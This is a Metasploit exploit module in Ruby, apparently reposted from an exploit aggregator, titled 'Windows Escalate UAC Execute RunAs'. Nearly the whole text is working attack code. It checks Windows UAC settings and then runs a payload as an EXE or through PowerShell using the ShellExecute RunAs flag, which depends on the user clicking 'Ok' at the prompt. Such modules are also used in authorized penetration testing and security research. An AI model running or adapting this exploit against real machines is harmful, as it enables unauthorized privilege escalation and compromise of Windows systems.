Share
## https://sploitus.com/exploit?id=PACKETSTORM:181500
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Post::Windows::Priv  
include Post::Windows::Runas  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Windows Escalate UAC Execute RunAs',  
'Description' => %q(  
This module will attempt to elevate execution level using  
the ShellExecute undocumented RunAs flag to bypass low  
UAC settings.  
),  
'License' => MSF_LICENSE,  
'Author' => [  
'mubix', # Original technique  
'b00stfr3ak' # Added powershell option  
],  
'Platform' => ['win'],  
'SessionTypes' => ['meterpreter'],  
'Targets' => [['Windows', {}]],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2012-01-03'  
))  
  
register_options([  
OptString.new('FILENAME', [false, 'File name on disk']),  
OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),  
OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),  
])  
end  
  
def exploit  
if is_uac_enabled?  
print_status 'UAC is Enabled, checking level...'  
case get_uac_level  
when UAC_NO_PROMPT  
print_good 'UAC is not enabled, no prompt for the user'  
else  
print_status "The user will be prompted, wait for them to click 'Ok'"  
end  
else  
print_good 'UAC is not enabled, no prompt for the user'  
end  
  
case datastore['TECHNIQUE']  
when 'EXE'  
shell_execute_exe(datastore['FILENAME'], datastore['PATH'])  
when 'PSH'  
shell_execute_psh  
end  
end  
end